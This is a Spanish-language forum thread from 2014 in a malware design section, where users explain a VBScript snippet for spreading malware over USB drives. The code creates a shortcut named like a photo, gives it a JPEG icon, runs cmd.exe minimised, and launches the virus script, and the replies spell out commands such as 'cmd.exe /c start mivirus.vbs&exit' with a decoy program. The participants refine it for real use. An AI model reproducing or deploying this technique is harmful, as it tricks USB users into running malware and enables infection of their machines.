Foro de elhacker.net

Seguridad Informática => Análisis y Diseño de Malware => Mensaje iniciado por: jeshuem en 17 Marzo 2014, 23:59 pm


Título: Duda sobre USB spread
Publicado por: jeshuem en 17 Marzo 2014, 23:59 pm
Alguien que sea tan amable de explicarme estas lineas que dejo de ejemplo MadAntrax en uno de sus post, no estoy muy familiarizado con este tipo de spread.
Código
  1. set lnkobj = WSS.createshortcut (drive.path & "\mifoto.lnk")
  2. lnkobj.windowstyle = 7
  3. lnkobj.targetpath = "cmd.exe"
  4. lnkobj.workingdirectory = ""
  5. lnkobj.arguments = "/c start " & replace(wscript.scriptname," ", chrw(34) & " " & chrw(34)) & "&exit"
  6. lnkobj.iconlocation = WSS.regread ("HKEY_LOCAL_MACHINE\software\classes\jpegfile\defaulticon\")
  7. lnkobj.save()
  8.  

Título: Re: Duda sobre USB spread
Publicado por: xXSCORPIOXx en 18 Marzo 2014, 00:11 am
Digamos que basicamente crea el .lnk apuntando hacia el CMD con parametros y asignandole un Icono de imagen.

//Regards.

Título: Re: Duda sobre USB spread
Publicado por: jeshuem en 18 Marzo 2014, 00:49 am
Para ser mas preciso en la linea

Código
  1. lnkobj.arguments = "/c start " & replace(wscript.scriptname," ", chrw(34) & " " & chrw(34)) & "&exit"


que argumentos debe tener un lnk para que ejecute un programa?

Título: Re: Duda sobre USB spread
Publicado por: xXSCORPIOXx en 18 Marzo 2014, 01:28 am
Cita de: jeshuem en 18 Marzo 2014, 00:49 am
Para ser mas preciso en la linea

Código
  1. lnkobj.arguments = "/c start " & replace(wscript.scriptname," ", chrw(34) & " " & chrw(34)) & "&exit"


que argumentos debe tener un lnk para que ejecute un programa?

Simplemente llama a la aplicacion desde el CMD con "Start", aunque creo que se deberia usar WScript.ScriptFullName, a ver si lo ve MadAntrax.

//Regards.

Título: Re: Duda sobre USB spread
Publicado por: jeshuem en 18 Marzo 2014, 05:22 am
Cual es su sintaxis del argumento? sin el codigo como seria?

Título: Re: Duda sobre USB spread
Publicado por: Mad Antrax en 18 Marzo 2014, 10:36 am
No es necesario mandar argumentos a un LNK para que ejecute un fichero, son solo targetpath es suficiente.

En el ejemplo, lo que hace el código es crear un acceso directo a cmd.exe y le cambio el icono de la ventanita negra por la de la foto.jpg

básicamente el acceso sería:

cmd.exe /c start mivirus.vbs&exit

Podría ser también así:

cmd.exe /c start mivirus.vbs&start notepad.exe&exit

(Ese ejemplo ejecuta el virus + notepad y luego cierra el cmd). Si lo combinas con WindowsStyle=7 el cmd se ejecuta minimizado).

Saludos

Título: Re: Duda sobre USB spread
Publicado por: jeshuem en 18 Marzo 2014, 15:16 pm
La funcion replace que es para remplazar codenas a que viene?

Código
  1. replace(wscript.scriptname," ", chrw(34) & " " & chrw(34))

Título: Re: Duda sobre USB spread
Publicado por: Mad Antrax en 18 Marzo 2014, 15:18 pm
Cita de: jeshuem en 18 Marzo 2014, 15:16 pm
La funcion replace que es para remplazar codenas a que viene?

Código
  1. replace(wscript.scriptname," ", chrw(34) & " " & chrw(34))

No se pueden usar espacios en los nombres. Lo que hago es coger el nombre del fichero y reemplazo el espacio (" ") por chrw(34) & " " & chrw(34)

Título: Re: Duda sobre USB spread
Publicado por: jeshuem en 18 Marzo 2014, 16:22 pm
Ah ok gracias eres un grande jaja, no sabia que no se podia usar espacios, gracias. Ahora toca pasarlo a delphi.

Saludos.

Título: Re: Duda sobre USB spread
Publicado por: xXSCORPIOXx en 18 Marzo 2014, 22:37 pm
Cita de: ||MadAntrax|| en 18 Marzo 2014, 15:18 pm
No se pueden usar espacios en los nombres. Lo que hago es coger el nombre del fichero y reemplazo el espacio (" ") por chrw(34) & " " & chrw(34)
Eso era lo que a mi me despistaba, sería mejor algo tipo Chr(34) & WScript.ScriptFullName & Chr(34), no?

PD: Perdonad que no use Etiquetas, ando desde el movil por viajes de negocios.

//Regards.


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines